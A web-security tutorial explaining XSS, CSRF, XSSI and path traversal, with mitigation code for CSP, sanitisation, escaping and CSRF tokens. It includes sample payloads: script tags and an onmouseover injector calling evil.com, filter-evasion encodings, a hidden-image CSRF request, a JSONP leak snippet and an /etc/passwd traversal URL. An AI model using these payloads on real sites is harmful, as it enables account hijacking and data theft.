Basic XSS and how to mitigate it

security, frontend

Cross-Site Scripting (XSS) is a vulnerability that allows an attacker to run malicious code, typically JavaScript, in a victim's browser or in any other app that can execute it.

What is a Cross Site Scripting (XSS) attack?

The "cross site" part comes from the fact that the malicious code typically lives on the attacker's server (or on a third party the attacker has access to). There are two main ways an attacker can inject malicious code into a victim's page: by submitting it to sites that accept user content such as comments (stored XSS), or by crafting malicious URLs which trigger the attack when visited (reflected XSS).

Typically the malicious content uses some trick to include a script tag that loads the code doing the damage:

<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment...

To defuse the attacks, code and links need to be sanitised.

Can code from different domains be run in a web page? And why?

Yes. Browsers have always allowed a page to load scripts from other domains with a script tag, and there are good reasons for it. Cross-Origin Resource Sharing (CORS) is a related mechanism: it governs when a page may read responses from another origin, for example via XMLHttpRequest or fetch.

People want to import third-party code into their sites; the classic example is Google Analytics. Or they want to use copies of popular libraries hosted on a CDN (think jQuery, hosted on //code.jquery.com/), hoping that visitors will already have them in their cache by the time they visit the site. Or, for sites still using HTTP/1.1, they want to put their assets on a different subdomain, because a browser only downloads a limited number of files in parallel from the same domain (think Yahoo, who put all their assets on //s.yimg.com). Or a global website has a variety of localised domains (think amazon.de, amazon.fr ... all downloading scripts from amazon.com). Or, while developing on a subdomain (new-version.example.com), they want to download assets from the live site (say www.example.com).

Can you control which domain downloads which scripts?

There is an HTTP header which you can set on your server, Access-Control-Allow-Origin, to control which other origins may read your resources from their pages. It is universally supported, but it doesn't really help with XSS: it is about other sites using your resources on their pages, while you want the opposite, to stop their code running on your pages.

What you really want is a Content Security Policy (CSP), sent in the Content-Security-Policy HTTP header, which tells the browser which domains a page is allowed to load scripts and other resources from. It is newer than Access-Control-Allow-Origin, but all current major browsers support it.
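
As a rough sketch of what such a policy looks like, the snippet below assembles a header value that only allows scripts from the site itself and from the jQuery CDN mentioned earlier. The buildCsp helper and the chosen hosts are assumptions for illustration; the directive names (default-src, script-src, object-src) are standard CSP directives.

```javascript
// Build a Content-Security-Policy header value from a map of directives.
// buildCsp is a hypothetical helper; the hosts are example choices.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(" ")}`)
    .join("; ");
}

const policy = buildCsp({
  "default-src": ["'self'"],
  "script-src": ["'self'", "https://code.jquery.com"],
  "object-src": ["'none'"],
});

// The server would send this as a response header.
console.log("Content-Security-Policy: " + policy);
```

With a policy like this, a script tag pointing at evil.com would be blocked by the browser even if it made it into the page.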

Stored XSS: File Upload displayed in an iframe

When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside:

This is my cool HTML page <script><!--
... here I can do evil things ...
--></script>

This is a relatively simple attack to mitigate. Since you control the server where the uploaded files are stored, you can make sure they are served from a separate subdomain, say user-content.example.com. The browser's same-origin policy then stops scripts in those files from accessing content on the main domain.
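
To see why the subdomain helps, here is a minimal sketch of the comparison the browser effectively makes. The sameOrigin helper and the upload path are made up for illustration; the URL class is the standard one available in browsers and Node.

```javascript
// Two URLs share an origin only if scheme, host and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

const mainSite = "https://example.com/account";
// Hypothetical location of an uploaded file.
const upload = "https://user-content.example.com/uploads/cool-page.html";

console.log(sameOrigin(mainSite, upload)); // false
console.log(sameOrigin(mainSite, "https://example.com/comments")); // true
```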

Reflected XSS

The classic reflected XSS attack tries to add a script tag to a URL: https://example.com/<script>..evil.. </script>. Of course the attack will never be so blatant, but browsers and other apps decode various encodings of special characters, so the tag can be disguised. Although these days they have built-in protection for most cases, it's interesting to know what we are being protected against. And anyway, some day you may find yourself coding for an environment where that protection doesn't exist.

example.com/%3cscript%3e                  URL % encoding
example.com/%253cscript%253e              double URL % encoding
example.com/%c0%bcscript%c0%be            overlong (invalid) UTF-8 encoding
example.com/%26lt;script%26gt;            HTML encoding
example.com/%26amp;lt;script%26amp;gt;    double HTML encoding
example.com/\074script\076                octal escape
example.com/\x3cscript\x3e                hexadecimal escape
example.com/\u003cscript\u003e            Unicode escape
example.com/+ADw-script+AD4-              UTF-7 encoding
...
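
The first three rows can be explored with a small sketch like the one below. It assumes a hypothetical fullyDecode helper that keeps percent-decoding until the string stops changing, so that double encoding cannot hide a tag, and that rejects anything it cannot decode. decodeURIComponent is the standard built-in; everything else is illustrative.

```javascript
// Percent-decode repeatedly until the value is stable.
// Returns null when the input is malformed or needs suspiciously many rounds.
function fullyDecode(input, maxRounds = 5) {
  let current = input;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return null; // invalid sequence, e.g. overlong UTF-8: reject
    }
    if (next === current) return current; // nothing left to decode
    current = next;
  }
  return null; // still changing after maxRounds: reject
}

console.log(fullyDecode("example.com/%3cscript%3e"));       // example.com/<script>
console.log(fullyDecode("example.com/%253cscript%253e"));   // example.com/<script>
console.log(fullyDecode("example.com/%c0%bcscript%c0%be")); // null
```

Only after decoding like this does it make sense to check the value for angle brackets or to escape it.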

Stored XSS

In the typical stored XSS attack, a site has a comment system or something similar, and the attacker tries to submit an HTML fragment with a script tag in it. There are different ways they can try that.

Simple attacks with script tags and HTML sanitisation

The obvious way may work if the site was built by hobbyists or amateurs, but a simple regular expression is usually enough to stop it.

Great site! <script src="http://evil.com/xss.js"></script>

Regular expressions are not the best approach though. One reason is that while it is easy to match valid HTML, attackers often get around the match by submitting invalid HTML, taking advantage of the fact that browsers are very forgiving. So they could submit the following:

Great site! <a href="<script src="http://evil.com/xss.js"></script>

Or use hidden, non-rendered characters that can break a regular expression but are ignored by many browsers:

Great site! <scr\0ipt src="http://evil.com/xss.js"></sc\0ript>

Or even simply upper case letters:

Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>
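
A quick sketch shows how fragile the regular expression approach is. The naiveStrip function below is a deliberately simplistic filter written for this illustration, not a recommended one.

```javascript
// A deliberately naive filter: it only knows about lower-case script elements.
function naiveStrip(html) {
  return html.replace(/<script[^>]*>.*?<\/script>/g, "");
}

const lower = 'Great site! <script src="http://evil.com/xss.js"></script>';
const upper = 'Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>';

console.log(naiveStrip(lower)); // the script element is removed
console.log(naiveStrip(upper)); // the upper-case variant passes through untouched
```

Adding the i flag fixes this particular case, but each of the other tricks needs yet another patch, which is why parsing works better than pattern matching.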

The best approach to sanitisation is:

  • parse the input into a DOM tree which is not rendered in the page
  • have a whitelist of allowed tags and attributes, and go through every node of the parsed DOM, deleting whatever is not on the whitelist
  • make sure any URLs and CSS attributes that are allowed are strictly sanitised. Be careful of URLs using the javascript: protocol
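
The steps above can be sketched roughly as follows. To keep the example runnable outside a browser, it assumes the input has already been parsed into a tree of plain objects with type, tag, attrs and children fields; that shape, the ALLOWED list and the sanitise function are all assumptions for illustration. In a browser the tree would come from a real parser instead.

```javascript
// Whitelist: tag name -> attributes allowed on that tag (example choices).
const ALLOWED = new Map([
  ["p", []],
  ["b", []],
  ["i", []],
  ["a", ["href"]],
]);
// Only URLs starting with these schemes are kept, so javascript: is refused.
const SAFE_URL = /^(?:https?:|mailto:)/i;

// Returns a cleaned copy of the node, or null if the node must be dropped.
function sanitise(node) {
  if (node.type === "text") return { type: "text", value: node.value };
  const tag = node.tag.toLowerCase();
  const allowedAttrs = ALLOWED.get(tag);
  if (!allowedAttrs) return null; // not whitelisted: drop the whole subtree
  const attrs = {};
  for (const name of allowedAttrs) {
    const value = (node.attrs || {})[name];
    if (typeof value !== "string") continue;
    if (name === "href" && !SAFE_URL.test(value.trim())) continue;
    attrs[name] = value;
  }
  const children = (node.children || [])
    .map(sanitise)
    .filter((child) => child !== null);
  return { type: "element", tag, attrs, children };
}

const dirty = {
  type: "element", tag: "P", attrs: { onmouseover: "evil()" },
  children: [
    { type: "text", value: "Great site!" },
    { type: "element", tag: "script", attrs: { src: "http://evil.com/xss.js" }, children: [] },
    { type: "element", tag: "a", attrs: { href: "javascript:evil()" },
      children: [{ type: "text", value: "link" }] },
  ],
};
const clean = sanitise(dirty);
console.log(JSON.stringify(clean));
```

The important design choice is that the code lists what is allowed rather than what is forbidden, so anything unexpected is dropped by default.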

Using HTML attributes for XSS attacks

One doesn't necessarily need a script tag for stored XSS: some JavaScript in a tag attribute is enough. The following would be triggered when someone moves the mouse over the comment:

<p ONMOUSEOVER="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.body.appendChild(s);">Great site!</p>

Using CSS attributes for XSS attacks

If a site allows users to, say, choose a color for the text of their comments, an attacker could submit something like red;" onmouseover="...evil JS..." as the color, and the page ends up with

<!-- what the coder expected the final results to be when they built the site -->
<p style="color:SOME_CUSTOM_COLOR;">My Home Page</p>
<!-- what the attacker injected -->
<p style="color:red;" onmouseover="...evil JS...">My Home Page</p>
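
One way to defuse this, sketched below, is to accept only values that match a strict pattern and fall back to a default otherwise. The safeColor helper and its pattern (hex colors and plain color names) are assumptions for illustration; a real site may need to allow more formats.

```javascript
// Accept #rgb, #rrggbb or a plain alphabetic color name; nothing else.
const SAFE_COLOR = /^(?:#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})$/i;

function safeColor(input, fallback = "black") {
  return SAFE_COLOR.test(input) ? input : fallback;
}

console.log(safeColor("red"));                          // red
console.log(safeColor("#ff0000"));                      // #ff0000
console.log(safeColor('red;" onmouseover="evil()'));    // black
```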

Stored JavaScript

A typical XSS fragment for a site that allows user submissions:

innocent looking text and then <span style=display:none>"
+ (...evil js..., "")
+ "</span> nothing to see here

That relies on the submission being pasted unescaped into a JS string literal: its double quote closes the string early, so the part in parentheses runs as code. The resulting script looks like

$someElement.innerHTML = "innocent looking text and then <span style=display:none>"
+ (...evil js..., "")
+ "</span> nothing to see here";

The not so common comma operator in (...evil js..., "") returns the item on the right. The comma operator is often used when golfing / minifying, but rarely when hand coding because it is hard to read. It simply evaluates the item on the left, discards the result, and returns the one on the right: var a = (1, 2); console.log(a); //2.

So it is important to escape strings that will be handled by JS, using \x27 for single quotes and \x22 for double quotes.
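
A minimal sketch of such escaping is shown below. The escapeForJsString helper is hypothetical, and the set of characters it escapes (quotes, backslash, angle brackets, ampersand and line terminators) is an assumption about what a reasonable minimum looks like, not a complete specification.

```javascript
// Replace characters that could end a JS string literal or an enclosing
// script element with \xNN (or \uNNNN) escapes.
function escapeForJsString(text) {
  return text.replace(/[\\'"<>&\r\n\u2028\u2029]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

const submission = 'innocent text "+(evil(),"")+" more';
const escaped = escapeForJsString(submission);
console.log(escaped); // innocent text \x22+(evil(),\x22\x22)+\x22 more
```

When the escaped value is placed between quotes in a generated script, the JS engine turns it back into the original text, but it can no longer break out of the string.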

Reflected XSS via AJAX

Sometimes a site takes a fragment of the URL and inserts it into the page via JS. An example is Google Translate: https://translate.google.com/#en/de/...evil js..., where "...evil js..." could be <script>evil js</script> and may be inserted into the translation box and translated, if the site isn't careful (obviously Google are). The way to handle this is to escape the < and > characters as \x3c and \x3e. It is also important to set the charset of your document with the header Content-Type: text/html; charset=utf-8, to stop the browser interpreting it as UTF-7, where +ADw- and +AD4- are the encodings for < and >.
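
The \x3c and \x3e escapes apply when the value ends up inside a JS string. When the value is instead placed directly into HTML, the equivalent step is to use HTML entities. The escapeHtml helper below is a common pattern written out as a sketch; it is not taken from any particular library.

```javascript
// Map the five characters that are special in HTML to their entities.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

console.log(escapeHtml("<script>evil js</script>"));
// &lt;script&gt;evil js&lt;/script&gt;
```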

Cross-Site Request Forgery (XSRF)

This happens when an attacker stores some code in a page that requests a resource (often an image, but it could be the favicon too, for example) from a separate third-party site, for example your bank or Facebook (though it is unlikely they don't protect themselves from such attacks). If you are already logged in to the third-party site, the browser will send your cookies along with the request. So you could have an exploit such as

An innocent message, la la
<!-- display:none hides the exploit from the victim -->
<!-- src is a (fake) command which the user needs to be logged in to run;
     if the user IS already logged in, it will be run, as the cookies
     will be sent. It doesn't matter that the response is not an image,
     because of the display:none -->
<img
    style="display:none"
    src="http://facebook.com/post/?msg=blah"
    >

To mitigate those attacks, for a start make sure that requests which change anything use POST and not GET. With each POST request, send a token tied to the user's session that includes a timestamp, and expire the login if the timestamp is too old (old = a few minutes). Generate a new token for every request. Maybe even generate different tokens for different types of requests.
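
One possible shape for such a token, sketched for Node, is a timestamp plus an HMAC over the session id and that timestamp. The function names, the five minute limit and the in-memory secret are assumptions for illustration; the crypto calls (createHmac, randomBytes, timingSafeEqual) are Node's built-in ones. This sketch only checks age and authenticity; making each token single-use would need server-side storage on top.

```javascript
const crypto = require("crypto");

const SECRET = crypto.randomBytes(32); // hypothetical per-server secret
const MAX_AGE_MS = 5 * 60 * 1000;      // "a few minutes"

// HMAC over the session id and timestamp, so neither can be changed.
function sign(sessionId, timestamp) {
  return crypto
    .createHmac("sha256", SECRET)
    .update(`${sessionId}:${timestamp}`)
    .digest("hex");
}

function issueToken(sessionId, now = Date.now()) {
  return `${now}.${sign(sessionId, now)}`;
}

function verifyToken(token, sessionId, now = Date.now()) {
  const [timestampText, mac] = String(token).split(".");
  const timestamp = Number(timestampText);
  if (!Number.isInteger(timestamp) || typeof mac !== "string") return false;
  if (timestamp > now || now - timestamp > MAX_AGE_MS) return false;
  const expected = Buffer.from(sign(sessionId, timestamp));
  const received = Buffer.from(mac);
  // Constant-time comparison; lengths must match before calling it.
  return expected.length === received.length &&
    crypto.timingSafeEqual(expected, received);
}

const token = issueToken("session-1");
console.log(verifyToken(token, "session-1")); // true
console.log(verifyToken(token, "session-2")); // false
```

An attacker's page can make the browser send cookies, but it cannot read the token out of your pages, so the forged request fails verification.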

Cross Site Script Inclusion (XSSI)

In this case the attacker includes your script in their page. That way they can read any global variables your script defines, since the browser runs both scripts in the same environment. The simplest example is when sensitive data is embedded directly in the JS:

// your_script.js
var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc

// attacker_page.html
<!doctype HTML>
<html>
<head>
    <script src="your_script.js"></script>
    <script>alert(privateKey)</script>
...

Another source of attacks is JSONP, as an attacker can simply define the callback function themselves:

// attacker_page.html
<script>
    var my_callback = function (my_leaked_data) {
        doEvil(JSON.stringify(my_leaked_data));
    };
</script>
<script src="https://your_site/p?jsonp=my_callback" type="text/javascript"></script>

The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), plus making responses non-executable by adding a prefix such as ])}while(1);</x>, which your own code strips before parsing.
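
A small sketch of the prefix idea, using the prefix from the text: the server prepends it to every JSON response, and the site's own client code removes it before parsing. The wrapJson and parsePrefixedJson helpers are hypothetical names.

```javascript
const PREFIX = "])}while(1);</x>";

// Server side: make the response unusable as a script.
function wrapJson(data) {
  return PREFIX + JSON.stringify(data);
}

// Client side: same-origin code can read the text and strip the prefix.
function parsePrefixedJson(body) {
  if (!body.startsWith(PREFIX)) {
    throw new Error("response is missing the expected prefix");
  }
  return JSON.parse(body.slice(PREFIX.length));
}

const body = wrapJson({ balance: 42 });
console.log(parsePrefixedJson(body).balance); // 42
```

A page on another site that pulls the response in with a script tag only gets a syntax error, because the prefix is not valid JavaScript.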

Path Traversal

This is the classic exploit which tries to trick the server into serving files outside the server root.

https://example.com/../../../../../../../etc/passwd

Few servers are configured by default to allow that, but be careful when customising configurations. Also be careful about allowing users to choose strings such as brett/../../ as a username.
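
If you ever have to map request paths to files yourself, a check along these lines helps. This is a sketch for Node using its built-in path module; the resolveInsideRoot helper and the /var/www root are assumptions, and the requested path is assumed to be already URL-decoded.

```javascript
const path = require("path");

// Resolve a requested path against the root and refuse anything that
// ends up outside it. Returns the absolute path, or null if refused.
function resolveInsideRoot(root, requestedPath) {
  const rootAbs = path.resolve(root);
  // Prefixing with "." keeps a leading "/" in the request relative to root.
  const target = path.resolve(rootAbs, "." + path.sep + requestedPath);
  const inside = target === rootAbs || target.startsWith(rootAbs + path.sep);
  return inside ? target : null;
}

console.log(resolveInsideRoot("/var/www", "/img/logo.png"));
console.log(resolveInsideRoot("/var/www", "/../../../../etc/passwd")); // null
```

The same function can be used to vet user-chosen names such as brett/../../ before they are used as part of a file path.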

Conclusion

This is just scratching the surface of XSS and related attacks; it is a specialist field which, however, every front-end developer should at least be familiar with.